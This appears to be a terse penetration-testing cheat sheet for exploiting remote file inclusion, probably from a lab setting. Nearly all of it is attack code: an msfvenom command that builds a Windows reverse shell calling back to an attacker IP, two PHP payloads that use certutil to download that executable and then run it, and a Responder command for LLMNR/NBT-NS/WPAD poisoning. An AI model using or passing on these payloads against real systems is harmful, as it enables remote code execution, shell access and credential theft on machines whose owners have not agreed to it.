RFI

Check

python3 -m http.server 80

http://192.168.45.163/

Get a shell

• Windows

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.163 LPORT=4444 -f exe -o shell.exe

mousepad step1.php

<?php 
$exec = system('certutil.exe -urlcache -split -f "http://192.168.45.163/shell.exe" shell.exe', $val); 
?>


mousepad step2.php

<?php 
$exec = system('shell.exe', $val); 
?>

Responder LLMNR/NBT-NS/WPAD poisoning attack

sudo responder -I tun0 -wv